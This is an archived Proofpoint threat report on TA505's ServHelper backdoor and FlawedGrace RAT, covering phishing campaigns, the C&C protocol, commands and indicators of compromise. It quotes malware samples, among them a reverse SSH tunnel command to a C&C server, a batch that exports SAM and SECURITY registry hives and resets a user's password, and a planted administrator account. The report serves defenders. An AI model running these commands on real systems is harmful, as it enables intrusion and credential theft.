{ "id": "e1cec180-f869-408b-81c4-668e090696aa", "created_at": "2026-04-06T00:09:46.359693Z", "updated_at": "2026-04-10T03:36:36.859082Z", "deleted_at": null, "sha1_hash": "225db53760733b893a9375cae18576cb22e501b4", "title": "ServHelper \u0026 FlawedGrace: New TA505 Malware | Proofpoint US", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2550435, "plain_text": "ServHelper \u0026 FlawedGrace: New TA505 Malware | Proofpoint US\r\nBy January 09, 2019 Dennis Schwarz and Proofpoint Staff\r\nPublished: 2019-01-09 · Archived: 2026-04-05 14:40:42 UTC\r\nOverview\r\nFor much of 2018, we observed threat actors increasingly distributing downloaders, backdoors, information\r\nstealers, remote access Trojans (RATs), and more as they abandoned ransomware as their primary payload. In\r\nNovember 2018, TA505, a prolific actor that has been at the forefront of this trend, began distributing  a new\r\nbackdoor we named “ServHelper”. ServHelper has two variants: one focused on remote desktop functions and a\r\nsecond that primarily functions as a downloader. Additionally we have observed the downloader variant download\r\na malware we call “FlawedGrace.” FlawedGrace is a full-featured RAT that we first observed in November 2017.\r\nTA505 appears to be actively targeting banks, retail businesses, and restaurants as they distribute these malware\r\nfamilies. This targeting falls in line with other activity we reported earlier in 2018.[1] [2]\r\nCampaign Analysis\r\nNovember 9 “Tunnel” Campaign\r\nOn November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new\r\nmalware family that we call “ServHelper” based on file names associated with infection. The campaign primarily\r\ntargeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained\r\nMicrosoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware.\r\nThis campaign used the “tunnel” variant of ServHelper, described in the “Malware Analysis” section.\r\nFigure 1: Example email message from the November 9 “tunnel” campaign\r\nNovember 15 “Downloader” Campaign\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 1 of 17\n\nOn November 15, 2018, we saw a similar, but larger campaign (tens of thousands of messages) from the same\r\nactor. In addition to financial institutions, this campaign also targeted the retail industry. The messages (Figure 2)\r\ncontained Microsoft “.doc”, “.pub”, or “.wiz” attachments. The documents contained macros that, when enabled,\r\ndownloaded and executed the ServHelper malware. This campaign used the “downloader” variant of ServHelper\r\nwith the tunneling functionality removed.\r\nFigure 2: Example email message from the November 15 “downloader” campaign\r\nDecember 13 “FlawedGrace” Campaign\r\nOn December 13, 2018, we observed another large ServHelper “downloader” campaign targeting retail and\r\nfinancial services customers. The messages used a mixture of Microsoft Word attachments with embedded\r\nmalicious macros, PDF attachments with URLs linking to a fake “Adobe PDF Plugin” webpage linking to the\r\nmalware (Figure 3), and direct URLs in the email body linking to a ServHelper executable.\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 2 of 17\n\nFigure 3: Example PDF attachment containing a URL linking to the fake “Adobe PDF Plugin” page\r\nIn this campaign, we observed ServHelper download (Figure 4) and execute an additional malware that we call\r\n“FlawedGrace.” FlawedGrace is a robust remote access trojan (RAT) that we initially encountered in November\r\n2017, but have rarely observed since.\r\nFigure 4: Fiddler screenshot showing ServHelper downloading FlawedGrace\r\nServHelper Malware Analysis\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 3 of 17\n\nServHelper is a new malware family -- best classified as a backdoor -- that we first observed in the wild in\r\nNovember 2018. Its name is based on a filename (ServHelper.dll) that we noted in the November 9 “tunnel”\r\ncampaign described above. A sample from a later campaign used command and control (C\u0026C) URIs containing\r\n“/rest/serv.php” which also reference a “serv” component.\r\nThe malware is written in Delphi and at the time of this writing is being actively developed. New commands and\r\nfunctionality are being added to the malware in almost every new campaign so we will not focus on one specific\r\nsample for this analysis. Rather, we will discuss the malware family generally; see the “Indicators of\r\nCompromise” section below for specific reference samples.\r\nAs noted, there are two distinct variants of ServHelper: a “tunnel” variant and a “downloader” variant. The\r\n“tunnel” variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to\r\naccess the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access,\r\nthe malware contains functionality for the threat actor to “hijack” legitimate user accounts or their web browser\r\nprofiles and use them as they see fit. The “downloader” variant is stripped of the tunneling and hijacking\r\nfunctionality and is used as a basic downloader.\r\nBoth variants of ServHelper use the same HTTP C\u0026C protocol on port 443 (HTTPS) and, less frequently, port 80\r\n(HTTP). An example of the initial phone home to the C\u0026C server is shown in Figure 5.\r\nFigure 5: Example of ServHelper’s initial phone home\r\nEarly versions of the malware used a semi-random URI such as: “/ghuae/huadh.php”. Newer versions have started\r\nusing more typical URIs such as:\r\n/support/form.php\r\n/rest/serv.php\r\n/sav/s.php\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 4 of 17\n\nMost of the C\u0026C domains that we have observed have been in the “.pw” top-level domain (TLD) such as:\r\nchecksolutions[.]pw\r\nafgdhjkrm[.]pw\r\npointsoft[.]pw\r\ndedoshop[.]pw\r\nHowever, recently the developer has added support for “.bit” C\u0026C domains; this TLD is associated with the\r\ncryptocurrency Namecoin and requires special DNS servers that the malware uses:\r\ndedsolutions[.]bit\r\narepos[.]bit\r\nThe POST data in these C\u0026C communications contains three URL-encoded parameters: “key”, “sysid”, and\r\n“resp”. The “key” parameter is a hardcoded string in the malware that does not appear to be used elsewhere in the\r\ncode. Examples of observed keys include:\r\nGsiss744@sd\r\nasdgdgYss455\r\n#567sisGdsa\r\nThe “sysid” parameter contains a campaign ID in newer versions of the malware, the Windows version running on\r\nthe infected machine, system architecture, username, and a random integer. Examples of observed campaign IDs\r\ninclude:\r\nclean12\r\nchistka12.17\r\nnoP_19\r\nnonRDP\r\nno24\r\nny_upd\r\nThe “resp” parameter contains responses to commands received from the controller.\r\nAn example command sent from the C\u0026C server to the infected machine can be seen in the Fiddler screenshot in\r\nFigure 4 above. It contains a command, carrot (“^”) delimiter, and command arguments. We observed the\r\nfollowing commands in the malware:\r\nnop\r\nImplements a keep-alive type of functionality. The infected machine responds to the C\u0026C server with a “nop ok”\r\nmessage.\r\ntun (“tunnel” variant only)\r\nSets up a reverse SSH tunnel connecting the C\u0026C server to the infected system’s RDP port (3389). In earlier\r\nversions, a loader component performed the initial setup for this and other commands by:\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 5 of 17\n\nExtracting and dropping an OpenSSH binary from its PE resources\r\nExtracting, dropping, and configuring the RDP Wrapper Library software from its PE resources\r\nCreating a new user “supportaccount” with a password of “Ghar4f5”\r\nAdding this user to the “Remote Desktop Users” and “Administrators” groups\r\nIn more recent versions, this functionality of the loader component was integrated into the core ServHelper code,\r\nusing built-in Windows remote desktop support instead of a third-party software package. This command sets up a\r\nreverse SSH tunnel by executing the dropped OpenSSH binary with the following command line arguments:\r\n-N -R \u003cremote port\u003e:localhost:3389 tunnel@\u003cC\u0026C server\u003e\r\nOnce configured, ServHelper sends a “tun ok\\r\\nport:\u003cremote port\u003e tun pid:\u003cSSH process id\u003e” to the C\u0026C\r\nserver.\r\nslp\r\nSets a sleep timeout.\r\nfox (“tunnel” variant only)\r\nCopies a Firefox web browser profile from one user to another. Earlier versions used the Windows “xcopy”\r\ncommand. Later versions download a self-extracting RAR file from the C\u0026C server (/cp/cp.exe) and decompress\r\nit using the password “123”. One of the files in this archive is a piece of software known as \"Runtime's Shadow\r\nCopy\" and it is used to copy the web browser profiles.\r\nchrome (“tunnel” variant only)\r\nSimilar to the “fox” command but for Chrome web browser profiles.\r\nkilltun (“tunnel” variant only)\r\nKills an SSH tunnel process associated with a particular remote port. Once killed, it sends a “killtun ok” message\r\nto the C\u0026C server.\r\ntunlist (“tunnel” variant only)\r\nGets a list of all active SSH tunnels and responds to the C\u0026C server with a message containing “active tun:\r\n\u003cremote port\u003e” entries for each active tunnel.\r\nkillalltuns (“tunnel” variant only)\r\nKills all SSH tunnel processes.\r\nshell\r\nExecutes a shell command and sends the response to the C\u0026C server.\r\nload\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 6 of 17\n\nDownloads and runs an executable from a specified URL. Responds to the C\u0026C server with either “load no param\r\nok” or “load param ok” depending if any command-line arguments were passed to the downloaded executable.\r\nsocks (“tunnel” variant only)\r\nSimilar to the “tun” command, but allows a reverse SSH tunnel to be built between the C\u0026C server to any\r\nserver/port (as specified by the command argument) through the infected system. Once configured, a “socks\r\nok\\r\\nport:\u003cremote port\u003e tun pid:\u003cSSH process id\u003e” message is sent to the C\u0026C server.\r\nselfkill\r\nRemoves the malware from the infected machine.\r\nloaddll (“downloader” variant only)\r\nA newer command that has only been observed in the “downloader” variant. Similar to the “load” command, but\r\nfor DLLs.\r\nbk (“tunnel” variant only)\r\nA newer command similar to the “tun” command. “bk” allows the reverse SSH tunnel to be set up using a C\u0026C\r\nspecified remote host instead of the hardcoded C\u0026C server.\r\nhijack (“tunnel” variant only)\r\nA newer command that appears to hijack a user account with a known password (“123”). It does so by creating\r\nand scheduling a task “test” to run a batch file containing the following commands:\r\nreg export hklm\\sam c:\\sam.reg\r\nreg export hklm\\security c:\\sec.reg\r\nnet user \u003ccommand argument username\u003e 123\r\nIt then schedules a task “test2” to run another batch file containing the following commands:\r\nschtasks /delete /tn \"test\" /F\r\nreg import c:\\sam.reg\r\nreg import c:\\sec.reg\r\nschtasks /delete /tn \"test2\" /F\r\nFinally it runs the first scheduled task ands send a “ready! try to login with pass 123” message to the C\u0026C server.\r\nforcekill (“tunnel” variant only)\r\nA newer command that is similar to the “killalltuns” but uses the Windows “taskkill” command.\r\nsethijack (“tunnel” variant only)\r\nA newer command that controls an “alerting” mechanism. A separate program thread monitors user logons. When\r\na legitimate user becomes active and the threat actor is connected to the infected system using the previously\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 7 of 17\n\ncreated “supportaccount” account, it runs the “chrome” and “fox” commands, copying the legitimate user’s web\r\nbrowser profiles to the “supportaccount” user. It then alerts the threat actor by sending message boxes containing\r\n“login detected, begin hijacking” and “profiles hijacked!” messages. These are sent by a “msg.exe” program\r\ncontained in the “cp.exe” archive discussed in the “fox” command above.\r\nchromeport (“tunnel” variant only)\r\nA newer command that implements the same functionality as the “chrome” command.\r\nDuring some of the ServHelper “downloader” campaigns, we observed commands (e.g., as shown in Figure 4\r\nabove) instructing the malware to download and execute another malware we call “FlawedGrace”.\r\nFlawedGrace Malware Analysis\r\nFlawedGrace is a remote access trojan (RAT) named after debugging artifacts (class names) left in the analyzed\r\nsample (see Figure 6).\r\nFigure 6: “Grace” class names shown by IDA Pro\r\nThe malware is written in C++. It is a very large program and makes extensive use of object-oriented and\r\nmultithreaded programming techniques. This makes reverse engineering and debugging the malware both difficult\r\nand time consuming. The coding style and techniques suggest that FlawedGrace was not written by the same\r\ndeveloper as ServHelper.\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 8 of 17\n\nWe initially observed FlawedGrace in an email campaign as early as November 2017, but until the recent\r\nServHelper campaigns, we had not observed it being actively distributed again. The malware usually contains a\r\ndebug string including a “version number” and “build date” distinct from the PE compile timestamp, allowing\r\nsearches of various malware repositories to find additional versions:\r\nUnknown version number built at “Aug  7 2017 22:28:47”\r\nVersion 2.0.7 built at “Oct 18 2017 04:18:39”\r\nVersion 2.0.8 built at “Oct 26 2017 12:05:44”\r\nVersion 2.0.9 built at “Nov  4 2017 22:28:10”\r\nVersion 2.0.10 built at “Nov 20 2017 10:53:33”\r\nVersion 2.0.11 built at “Dec 16 2017 08:02:46”\r\nPer the malware’s debug strings, significant development took place during the end of 2017. The ServHelper\r\ncampaigns were distributing version 2.0.10 of the malware.\r\nFlawedGrace creates, encrypts, and stores a configuration file containing the C\u0026C IPs and ports in a “\u003chex\r\ndigits\u003e.dat” file (e.g., “C:\\ProgramData\\21851a60.dat”). The first 16 bytes of the file are an AES initialization\r\nvector (IV). The rest of the data is AES-encrypted in CBC mode. In the analyzed sample, the AES key was\r\nhardcoded as “c3oeCSIfx0J6UtcV”. Once decrypted, the configuration data is stored as a custom serialization\r\n(Figure 7). Early versions of the malware used the class names “GraceParams” and “GraceValue” when\r\ninteracting with this part of the code, so it is likely that the serialization was designed and developed by the\r\nmalware developer and not a standard format.\r\nFigure 7: Plaintext configuration file showing C\u0026C IP and port\r\nFlawedGrace uses a complicated binary protocol for its command and control. It can use a configurable port for\r\ncommunications, but all samples we have observed to date have used port 443. Figure 8 shows an example of the\r\nfirst four messages between an infected system and C\u0026C server.\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 9 of 17\n\nFigure 8: FlawedGrace’s initial C\u0026C communications.\r\nWe are still reverse engineering and documenting the protocol, but we can provide an overview of the initial C\u0026C\r\ncommunications below:\r\nMessage 1\r\nInitial beacon from infected system. It is a 14-byte binary structure that contains at least the following parts:\r\nOffset 0x0: CRC32 hash of remaining data (DWORD)\r\nOffset 0x4: magic bytes \"GCRG\" (DWORD)\r\nMessage 2\r\nKey verification message from infected system. We believe that this is used to verify that one of the encryption\r\nkeys (static key) is the same on both the malware and C\u0026C server. It is a 52-byte binary structure that contains the\r\nfollowing analyzed offsets, among other components still under analysis:\r\nOffset 0x0: CRC32 hash of remaining data (DWORD)\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 10 of 17\n\nOffset 0x14: MD5 hash of the following pieces (16 bytes)\r\nA static key which has always been “static pass” in the samples analyzed\r\nThe random bytes at offset 0x24 that have been hex encoded and uppercased\r\nOffset 0x24: random bytes (16 bytes)\r\nMessage 3\r\nKey exchange message from C\u0026C server. This message delivers a second encryption key (dynamic key) used for\r\nfurther data transfers. It is a 42-byte structure that contains the following analyzed offsets, among other\r\ncomponents still under analysis:\r\nOffset 0x0: CRC32 hash of remaining data (DWORD)\r\nOffset 0x1a: dynamic key (16 bytes)\r\nMessage 4\r\nAn example of data transfer between infected system and C\u0026C server. It starts with a 38-byte binary header that\r\ncontains the following analyzed offsets, among other components still under analysis:\r\nOffset 0x0: CRC32 hash of the next 10 bytes (DWORD)\r\nOffset 0xE: AES IV (16 bytes)\r\nFollowing the header is the data that has been AES-encrypted in CBC mode. The AES key is generated using the\r\n“static key” and the “dynamic key” from messages 3 and 4 above. An example of key generation in Python\r\nappears in Figure 9.\r\nFigure 9: Example FlawedGrace C\u0026C data transfer encryption key generation in Python\r\nFigure 10 shows an example of the plaintext data transferred in message 4.\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 11 of 17\n\nFigure 10: Example FlawedGrace C\u0026C message 4 plaintext data\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 12 of 17\n\nThis message contains various system and malware information that has been serialized using the same method as\r\nfor configuration files. The serialized data is then packaged within additional binary data structures.\r\nWhile there are other message types with their own formats, the examples here provide initial insight into\r\nFlawedGrace’s C\u0026C protocol.\r\nFlawedGrace also uses a series of commands, provided below for reference:\r\ntarget_remove\r\ntarget_update\r\ntarget_reboot\r\ntarget_module_load\r\ntarget_module_load_external\r\ntarget_module_unload\r\ntarget_download\r\ntarget_upload\r\ntarget_rdp\r\ntarget_passwords\r\ntarget_servers\r\ntarget_script\r\ndestroy_os\r\ndesktop_stat\r\nConclusion\r\nThreat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like\r\nBart ransomware, which was only distributed for one day in 2016) or like Locky ransomware it may become the\r\ndominant strain of malware in the wild. In this case, the group has started distributing two variants on a new\r\nbackdoor we named ServHelper and a RAT we call FlawedGrace. This also extends the trend that emerged in\r\n2018, in which threat actors increasingly focused on distribution of downloaders, information stealers, RATS, and\r\nother malware that can remain resident on victim devices for far longer than destructive, “smash and grab”\r\nmalware like ransomware. We will continue to observe the distribution of these three malware variants but, at this\r\ntime, they do not appear to be one-offs, but rather long-term investments by TA505.\r\nReferences\r\n[1] https://www.proofpoint.com/us/threat-insight/post/ta505-targets-us-retail-industry-personalized-attachments\r\n[2] https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware\r\nIndicators of Compromise (IOCs)\r\nIOC\r\nIOC\r\nType\r\nDescription\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 13 of 17\n\n52c72a9de2f6e892f07827add85ad913b0541cd5c8449aadc2722f8eb75e548c SHA256\r\nNovember 9\r\n“Tunnel”\r\ncampaign\r\nattachment\r\nhxxp://officemysuppbox[.]com/staterepository URL\r\nNovember 9\r\n“Tunnel”\r\ncampaign\r\npayload\r\n1b0859ddbdebcb9d2bb46de00d73aa21bc617614b8123054426556783b211bc8 SHA256\r\nNovember 9\r\n“Tunnel”\r\ncampaign\r\nServHelper\r\nhxxps://checksolutions[.]pw/ghuae/huadh.php URL\r\nNovember 9\r\n“Tunnel”\r\ncampaign\r\nServHelper\r\nC\u0026C\r\nhxxps://rgoianrdfa[.]pw/ghuae/huadh.php URL\r\nNovember 9\r\n“Tunnel”\r\ncampaign\r\nServHelper\r\nC\u0026C\r\nhxxps://arhidsfderm[.]pw/ghuae/huadh.php URL\r\nNovember 9\r\n“Tunnel”\r\ncampaign\r\nServHelper\r\nC\u0026C\r\neb66ebb95a3dcecae64c61f611a9332fbf460d1b8039d3ab7e4f220104a4bec4 SHA256 November 15\r\n“Downloader”\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 14 of 17\n\ncampaign\r\nattachment\r\nhxxp://offficebox[.]com/host32 URL\r\nNovember 15\r\n“Downloader”\r\ncampaign\r\npayload\r\n3cd7e0a8321259e8446b2a9da775aae674715c74ff4923cfc8ec5102f380d41a SHA256\r\nNovember 15\r\n“Downloader”\r\ncampaign\r\nServHelper\r\nf4b9219f329803dd45afd5646351de456e608dd946830c961ec66c6c25e52cac SHA256\r\nDecember 13\r\n“FlawedGrace”\r\ncampaign\r\nattachment\r\nhxxp://office365onlinehome[.]com/host32 URL\r\nDecember 13\r\n“FlawedGrace”\r\ncampaign\r\npayload\r\nd56429d6d0222022fe8f4cb35a28cd4fb83f87b666a186eb54d9785f01bb4b58 SHA256\r\nDecember 13\r\n“FlawedGrace”\r\ncampaign\r\nServHelper\r\nhxxps://afgdhjkrm[.]pw/aggdst/Hasrt.php URL\r\nDecember 13\r\n“FlawedGrace” \r\ncampaign\r\nServHelper\r\nC\u0026C\r\nefcee275d23b6e71589452b1cb3095ff92b10ab68cd07957b2ad6be587647b74 SHA256 December 13\r\n“FlawedGrace”\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 15 of 17\n\ncampaign\r\nFlawedGrace\r\n46.161.27[.]241:443 IP:Port\r\nDecember 13\r\n“FlawedGrace”\r\ncampaign\r\nFlawedGrace\r\nC\u0026C\r\n9fccd107bd0aee3a2f39ad76a49758309c95545d8154b808eec24d2b51dc4579 SHA256\r\n“sethijack”\r\ncommand\r\nServHelper\r\nhxxp://dedsolutions[.]bit/sav/s.php URL\r\n“sethijack”\r\ncommand\r\nServHelper\r\nC\u0026C\r\nhxxp://dedoshop[.]pw/sav/s.php URL\r\n“sethijack”\r\ncommand\r\nServHelper\r\nC\u0026C\r\nhxxp://asgaage[.]pw/sav/s.php URL\r\n“sethijack”\r\ncommand\r\nServHelper\r\nC\u0026C\r\nhxxp://sghee[.]pw/sav/s.php URL\r\n“sethijack”\r\ncommand\r\nServHelper\r\nC\u0026C\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 16 of 17\n\na9492312f1258567c3633ed077990fe053776cd576aa60ac7589c6bd7829d549 SHA256\r\n“loaddll”\r\ncommand\r\nServHelper\r\nhxxps://vesecase[.]com/support/form.php URL\r\n“loaddll”\r\ncommand\r\nServHelper\r\nC\u0026C\r\nET and ETPRO Suricata/Snort Signatures\r\n2833522          ETPRO TROJAN Observed Malicious SSL Cert (HuadhServHelper RAT CnC)\r\n2833552          ETPRO TROJAN HuadhServHelper RAT CnC Domain Observed in SNI\r\n2833881          ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)\r\n2833985          ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)\r\n2834074          ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)\r\n2834233          ETPRO TROJAN ServHelper CnC Inital Checkin\r\n2828489          ETPRO TROJAN FlawedGrace CnC Activity\r\nSource: https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nhttps://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505" ], "report_names": [ "servhelper-and-flawedgrace-new-malware-introduced-ta505" ], "threat_actors": [ { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434186, "ts_updated_at": 1775792196, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/225db53760733b893a9375cae18576cb22e501b4.pdf", "text": "https://archive.orkl.eu/225db53760733b893a9375cae18576cb22e501b4.txt", "img": "https://archive.orkl.eu/225db53760733b893a9375cae18576cb22e501b4.jpg" } }